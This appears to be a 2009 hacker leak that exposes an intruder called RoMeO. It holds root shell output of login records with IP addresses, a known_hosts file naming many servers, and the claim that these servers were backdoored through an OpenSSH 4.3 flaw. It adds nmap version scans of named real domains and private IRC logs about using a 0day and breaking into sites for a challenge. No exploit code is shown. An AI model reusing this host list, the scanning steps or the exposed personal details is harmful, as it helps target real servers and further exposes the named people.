+ANTISECFORLULZ	[12:30am] <~RoMeO> ctrl+D										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <~RoMeO> didnt do that									      ANTISECFORLULZ
+ANTISECFORLULZ	[12:33am] <~RoMeO> gay shit										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen							      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+
+[root@velocity:/]# last | grep romeo
+romeo            ttyp3    188.50.84.224    Thu Jul  2 23:06 - 00:24  (01:17)
+romeo            ttyp0    188.50.84.224    Thu Jul  2 22:53 - 01:52  (02:58)
+romeo            ttyp6    188.51.85.13     Thu Jul  2 14:49 - 17:59  (03:09)
+romeo            ttyp5    188.51.85.13     Thu Jul  2 12:12   still logged in
+romeo            ttyp5    188.51.85.13     Thu Jul  2 11:02 - 11:05  (00:02)
+romeo            ttyp5    188.51.85.13     Wed Jul  1 20:29 - 20:29  (00:00)
+
+[root@velocity:/]# cat ~/ssh/known_hosts 
+light.co1.org ssh-dss AAAAB3NzaC1kc3MAAACBAN3XmImvEAnfEUs2QzYWuj7LVVNVNwPuIDfO9Wb+aSWWRwD28hXbfVSw3llyo+p8aERrCn5FcbVHodgmt7IuEER9roB6AoiH664XsQwIviSx/2mvMrvXVGYmdvtSINnwNH389DS2/chf2gsBz772tTNT2c8myM4drZ2ArkeNP81JAAAAFQDAt8OXB+nbsHkfxhYZzUtY5DWIcwAAAIEAoUvbQneoUMbzYNF71L7/6vQxcV9rnYSAOs7NBB3aH61NG+gYgSh0FL0Ctv2PcqFsjRLE7UK/mcl1Dvq5K87CGfcH4LDCiuI0zB9lWZfWbuN5axCllFczboa4ED5VkPfjEJDmKQbbSvVlQE9TTa3QPY8bxQmcDJ5e4nKcq2s0zbMAAACAPSrhPRr4kNipRtQMAztneiqaixSr6w/8CnXIINAMf/9xWqmg0ZWnsgOpY5t30m6BEEPZL/mjspAXnY5AKS6ZcIOzq5zFnw3Gvgz4E/X5uDvR2TUaEBFQI8noDyzMBH2KTcj2ipuEYr5SKYEtgBB8zCMXuJ2ufDBb0H9tjIJnf8M=
+zelda.vitalspeeds.com ssh-dss AAAAB3NzaC1kc3MAAAEBAKPbekcqfiUr+bg1wPxVWTYqnanbeckqLRM7N7g/24kGTi5ITtv4mbbWZrcdlkKOn0pjjpD4/cZ9NOZ5L9kn3+TOb4oozTB4zFbQKqNvQAr7/iw8eR72bdoRyzNCDLZpkM/4nMoMNclyZuUulYf7PHqqqiMVdcPNvis78GteI6uajJEQlIPiLB2oaFWrBvcGmbaBC4iKihvprcJJ+9dsKVlbXVBR6kkjagvr+jkhDxYQ5cWtwy+0+7/tiogvinuTUNdgxyociCv26aLBdwTQuluiJhYSWLR2HnV2qxnNRoqzoIQY8gxLBHDNh58k7puc9KMIE0D9XNDfkf6cSQeQpIMAAAAVAOqStUQquE8fqirTa8WxVJbo99i5AAABAHh+6hGu61iPvGQ20dw3+8+O0rc94famvy9gO2+8USsT4/pyqKVdPtXjZVcwSMVpcO+9Oj4fQSs+KRxmb3pfCmY0sdUpsuSiCaBDxKj7M45C+m9LzgytZi5iaesnOxipp0NS+xgvDJ1fqOj3hmLYl89wo6CCHBZhHo4jJ1/FzBmIXQZJOAsek61DOzkKzSdm8zZDZQEcP/DjNd9tLWWomDvOLZ0kwoUqlF08vxKU19wnMgvFyKUbE8bWq02/gE1dOwZ7IsemosVlVj1ogw/L/J2NeEnESnoYFSBKdKDmRqSvFmgtRGKxhGGjvw63054g+9UzJxOXdVHymqktH9aGQ+MAAAEAdJuQ46uo8jolkRk0hD3zoBweKjZWacEe7OkSw1jxk8LoGV3VjDMqAvf4xcPUje7l6tKeyrdoR1u7LcweDobqn5d8Ok1Ui0zZIf0hQQBGE5ecKNDEE7AOrbc7kBNNInRxgTnkGu87+k6d05tWHyHlXIZTEceblYZ2iM8ZSpKViTO2lL3nq7JwA3sSHX2pcJ0ED5vlw2KtafbXs+8VFga9s1+DJIvF/TrUasW/3Hlt+13/4EHp8H7fJZzEN1SUj8JfGuoLu4rsceCkBYwxPW/zidGxrgkgGZXePnN7Hnttzx8KFFuJRIrIIMiCJFEWcKMBc1+knCgF9iON2h7g0KSACQ==
+72.20.18.193 ssh-dss AAAAB3NzaC1kc3MAAACBAKnwL2xkqjelqTjnJT2ZGFEa9xRUpmdVdx0WSc3SAuDBnFmIv3JLOWsUwTzAtbvs8oRc6HTqrhardxR/C5Xym2dxvnYU7cjKxZHSuH3u9lchW1HS6OWr63fPdLXDDU1LWkvPVGCHzZKw1sZti/3LFMW6HWZDgsMyAQ/q+LeD/E2rAAAAFQD/Ftrlj6cfUu6ItwNJ7loaosdwuwAAAIBwuBVkHiiibruCbl6EwrbrZ/YA80HIS6xgVYK3AoAckXoClY2j8xAkRC4EirwsruTyGNK2BexAXx4E7JAkDvDs9hs8EfSo3TixtXuiBQVUSBpVm/P3425MbDioqQtYm1Q8GFP60vdq8DI3nTXvP+4y/KpDPiuwVX8ifyg9gML3+wAAAIBlRfTV+UdJNa2rN5j4EDHiI0xzuv1NEDIDKKH1XJqBZpdAyyqc+mYkLPcFn/3/T8Cw47G24Umou/lh+XK4PCUIXsUEwc3xGjENwRf62AXpvadEjzoUiyMQ5LEnEUyRBxBWTZtqOJE7EGL97kEDg+WnPd0X5qso9BDjP+LaT+Bqnw==
+72.20.18.144 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
+88.196.163.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4wjPA3bTL9ZvD137cH5sn8QnvuyMiZN13SF1gnojBAVC2EA1xO0F9okHLukDL+gTEOpbN+JA0W4rMrzAe58+dhSBpSSJlGnNwb14jLEp6GxYDn31+SRns8RWgprq7b/AD7aBUimlE2ExB9I57HIm31XVfO5QsMlg9EW2//4E6vU=
+ntora.eml.ee,194.204.32.101 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzoxPtx6AsAOJ+ZZmvtHHBWDi+mH9meDP24M9FPpxAn7lmoXDFlftNURU83/LjTMcym+jsbPVFMC3w6HrRyQQ8v8GFJVR9z/hfKFlUzEUEO7TX1UK39Mswo90wbTwhOpwD3/XkP6YsPZQwN+EN5x37oH9PCXs9KxVCAju0alSrw0=
+72.20.18.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
+localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+corp.efnet.net,66.63.177.130 ssh-dss AAAAB3NzaC1kc3MAAACBAIEGPI/+Mc3k8MLPbka2tHwx3R61Cg8Vm1R7tvlS7GJuGLUVAfMsEVGKkS/YMLFMoEoAi+vbKAi26YAW82BzJqGSeGNBtEYw6Xs0I6GrWmNKIQQZUEC/M2krMWaTw1ABCIS7K9DGWZFDclWIN73fBKzaWpUyT7X1aLjIBMR9b6nTAAAAFQCAUudmdw3AlJAzG4L5e0tOgHECRwAAAIBTHFmZBp8xyujK0irLERfUFGSMxrqtq4TqpZL0n6Zp/PgsG/TaGgc/B7XLxya3GkzDNnXUO3CtQe/rv5bM+68MwSO+8iFnYid2vinu6C5R1dTAKD9QYKR74U5naARdUnUtOmUVKRPHD9kOlJJuyWYjSCLbxnERzCB8/YHbkvcuYAAAAIAYsHYvOIIDzv7QWN/trtJbYbCAwaKDu0UB/bKN0iMJxxHTRRRfw8TxQ+y9YsfcFPcsMxwKUp+9+q7zjyi6dQ9FLfmMk3TiBiVGZgC20LE5K1TTMYERptzWCI4Ic6HiYAAHEnNxEb0jLmdGMnyWGq89h7AGcGLWPkj4zDn9MMgjmw==
+72.20.28.202 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
+98.192.246.70 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5iUbneFne+6pmfWqlHfXk19SpS8GAM6peFONJOQXMOhTYKnQvZg+3H4eP0aa3gr0ejDbr/UCyZugRez31OolzZsICM99dSE1yIdD57XFczY0QxffOz5C40dQvlfvNmQXRSptqYygHLJIvm1p6qpyZrnrhRwV5OiNogYLLMQqKRFxOlJWUEa/78mgfQ/LI3Edu1JX79cfhmYKak+WAs+ph3yn70HiFemksr3xJ7G2GQxGsg7jkbAnsrcsSO3KkI99uy9HN+dB2+sEu18kVzEYdKz0T1pjNZ3B5o2B55GhEsoHvrqpBNRmXT7jJcD4v0m0NqYfbFwmj4/x1ykfbmVf7w==
+189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
+makosolutions.com,67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
+89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+
+// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3
+
+NMap Scans of all servers compromised
+-------------------------------------
+
+1. nmap -v -sV -P0 webhostline.com -p 2222
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:28
+Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
+Initiating SYN Stealth Scan at 11:28
+Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
+Discovered open port 2222/tcp on 66.96.220.213
+Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
+Initiating Service scan at 11:28
+Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
+Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
+NSE: Script scanning 66.96.220.213.
+NSE: Script Scanning completed.
+Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
+Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
+PORT     STATE SERVICE VERSION
+2222/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)
+
+
+2. nmap -v -sV -P0 -p 22 vitalspeeds.com
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:28
+Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
+Initiating SYN Stealth Scan at 11:28
+Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
+Discovered open port 22/tcp on 66.197.170.181
+Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
+Initiating Service scan at 11:28
+Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
+Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
+NSE: Script scanning 66.197.170.181.
+NSE: Script Scanning completed.
+Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
+Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+3. nmap -v -sV -P0 -p 22 stardustdawn.com
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:29
+Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
+Initiating SYN Stealth Scan at 11:29
+Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
+Discovered open port 22/tcp on 64.191.69.101
+Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
+Initiating Service scan at 11:29
+Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
+Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
+NSE: Script scanning 64.191.69.101.
+NSE: Script Scanning completed.
+Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
+Interesting ports on mx101.stardustdawn.com (64.191.69.101):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+
+4. nmap -v -sV -P0 -p 2022 irc.indoirc.net
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
+Initiating Parallel DNS resolution of 1 host. at 11:29
+Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
+Initiating SYN Stealth Scan at 11:29
+Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
+Discovered open port 2022/tcp on 70.34.192.50
+Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
+Initiating Service scan at 11:29
+Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
+Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
+NSE: Script scanning 70.34.192.50.
+NSE: Script Scanning completed.
+Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
+Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
+PORT     STATE SERVICE VERSION
+2022/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+5. nmap -v -sV -P0 -p 22 absolute.ownage.net
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 12:23
+Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
+Initiating SYN Stealth Scan at 12:23
+Scanning absolute.ownage.net (72.20.28.205) [1 port]
+Discovered open port 22/tcp on 72.20.28.205
+Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
+Initiating Service scan at 12:23
+Scanning 1 service on absolute.ownage.net (72.20.28.205)
+Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
+NSE: Script scanning 72.20.28.205.
+NSE: Script Scanning completed.
+Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
+Interesting ports on absolute.ownage.net (72.20.28.205):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 1.99)
+
+Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+// OpenSSH upgraded to 5.2 
+
+6. nmap -sV -p 22 ircvps.com
+
+Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
+Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138)
+:
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Service detection performed. Please report any incorrect results at http://nmap.
+org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
+
+
+7. anti-sec:~/pwn# ./map ssanz.net
+
+IP: 66.197.143.133 ( osiris.ssanz.net )
+WWW: Apache/2.2.11
+SSH: SSH-2.0-OpenSSH_4.3
+
+IP: 66.197.204.101 ( devil.ssanz.net )
+WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
+mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
+SSH: SSH-2.0-OpenSSH_4.3
+
+
+8. Astalavista
+
+[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
+[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
+[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
+[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
+
+
+
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+ANTISECFORLULZ				  ANTISECFORLULZ
+ANTISECFORLULZ 	    Private Chat Logs     ANTISECFORLULZ
+ANTISECFORLULZ				  ANTISECFORLULZ
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+
+
+--- Log opened Wed Jun 17 09:05:41 2009
+09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
+09:06 -pand!- Irssi: Starting query in bhf with Glyph
+09:07 (RoMeO) wat
+09:07 (Glyph) Need to be more 'selective' 
+09:07 (Glyph) two of two ... tsk, tsk, tsk..
+09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it 
+09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
+09:08 (RoMeO) and where did you see me use it? lol 
+// Everywhere..
+
+09:08 (Glyph) Doesn't what distro, when there's another 'common element' 
+// OpenSSH <= 4.3
+
+09:08 (Glyph) Just saying need to be more circumspect.
+09:08 (Glyph) Not saying 'you'..
+09:09 (RoMeO) okay :]
+09:09 (Glyph) But I know you'll get w1rd to those responsible.
+09:09 (Glyph) Capice?
+09:09 (RoMeO) will do
+09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
+09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
+09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
+09:11 (Glyph) Rightio.
+09:11 (Glyph) two out of two 
+09:11 (Glyph) Both had a common element.
+09:11 (RoMeO) which is
+09:11 (Glyph) Besides being shitty about 'security'
+09:11 (Glyph) For pay type product.
+09:12 (RoMeO) yeah
+09:12 (RoMeO) the targetted people are publicized
+09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
+09:12 (RoMeO) the people who publish exploits
+09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
+09:13 (Glyph) lol.. not yesterday's demo ;)
+09:13 (RoMeO) yesterday was just to prove something to dark
+09:13 (RoMeO) he didnt say a word after that
+09:13 (Glyph) Aye.. but .....
+09:13 (Glyph) tipped the scales in my favour.
+09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
+09:14 (RoMeO) ofcourse
+09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
+09:14 (Glyph) But it does lead to disclosure.
+09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
+09:15 (RoMeO) sure, i understand
+09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think. 
+// Really ?
+
+09:15 (RoMeO) i never underestimate anyone
+09:15 (RoMeO) thats my rule 
+
+09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
+09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
+09:17  -> Glyph chuckles
+09:17 (Glyph) I'm well aware of that.
+09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
+09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
+09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
+09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
+09:19 (Glyph) Scratch that.. change pronouns to third person ;)
+09:19 (RoMeO) its between me and him ;p
+09:19 (RoMeO) he talks alot
+09:21 (Glyph) You know I log the publics?
+09:21 (RoMeO) i assume alot do
+
+09:22 (RoMeO) i just hope you dont log privates
+
+09:37 (RoMeO) so your job is basically... ?
+09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
+09:40 (RoMeO) nice, well i will bbl
+09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
+09:41 (RoMeO) haha
+--- Log closed Wed Jun 17 09:46:34 2009
+
+--- Log opened Wed Jun 17 14:21:36 2009
+14:21 (Glyph) Aye.
+14:22 (Glyph) Don't take the stuff I spin in channel to heart.
+14:22 (RoMeO) :)
+14:22 (Glyph) I'm interested in debating with Dark.
+14:22 (RoMeO) yeah i saw
+14:22 (Glyph) Plus it may actually spark some interest in the subject.
+14:22 (RoMeO) but again, all he does is talk
+14:22 (RoMeO) so what i did when i first met him was
+14:22 (RoMeO) to shut him up
+14:23 (RoMeO) i put him up on a challenge
+14:23 (Glyph) It's a topic that every individual needs to make a decision about.
+14:23 (RoMeO) we made some random guy on irc to post a random security site
+14:23 (RoMeO) and the challenge was who gets access to it first
+14:23 (RoMeO) i got in
+14:23 (RoMeO) he didnt
+14:23 (RoMeO) but he kept on arguing
+14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
+14:24 (Glyph) You know what that sounds like to me?
+14:24 (RoMeO) what
+14:24 (Glyph) 'tempest in a teacup'
+14:24 (RoMeO) lol
+14:24 (Glyph) Notice he braced me in channel..
+14:24 (Glyph) right.
+14:24 (RoMeO) right
+14:24 (Glyph) 'When did you stop beating your wife sir?'
+14:25 (RoMeO) lol.
+14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
+14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
+14:26 (Glyph) hmmm... I've been around a lot longer than that.
+14:26 (RoMeO) yea, just saying its not like he does that here only or just now
+14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
+14:26 (Glyph) Leopard isn't likely to change its spots
+14:27 (RoMeO) haha
+14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
+14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
+14:29 (Glyph) I presume you have an account at gso
+14:29 (RoMeO) i dont know honestly
+14:29 (RoMeO) but if ther was, it would be RoMeO
+--- Log closed Wed Jun 17 14:34:34 2009
+
+
+--- Log opened Thu Jun 18 17:35:20 2009
+17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
+17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
+17:35 -pand!- Irssi: Starting query in bhf with Dark
+17:36 (RoMeO) we just met on rizon
+17:36 (RoMeO) for a small chat
+17:36 (Dark) Word
+17:36 (Dark) Can I safely assume she's all up in -antisec?
+17:36 (Dark) In lieu of recent Astalavista incident?
+17:38 (Dark) Well
+17:38 (Dark) If you see her around again
+17:38 (Dark) Tell her Dark says hi
+17:38 (Dark) And thanks for everything
+17:38 (RoMeO) what do yoou mean -antisec
+17:38 (RoMeO) and willl do
+17:39 (Dark) I mean
+17:39 (Dark) She's probably restarting her actions
+17:39 (Dark) In zfo and whatnot
+17:39 (Dark) Just an assumption
+17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
+17:39 (RoMeO) actions etc
+17:39 (Dark) Good to hear
+17:39 (RoMeO) ^^
+17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
+17:40 (Dark) I may attempt to locate her and coax it out of her
+17:40 (Dark) Seeing as she's probably not using it anymore
+17:40 (RoMeO) yea, she is out of all this for now
+17:40 (RoMeO) too busy and whatnot
+17:40 (Dark) Haha
+17:41 (Dark) She's majoring in CompSci yea?
+17:41 (RoMeO) yes ;\
+17:41 (Dark) Eh
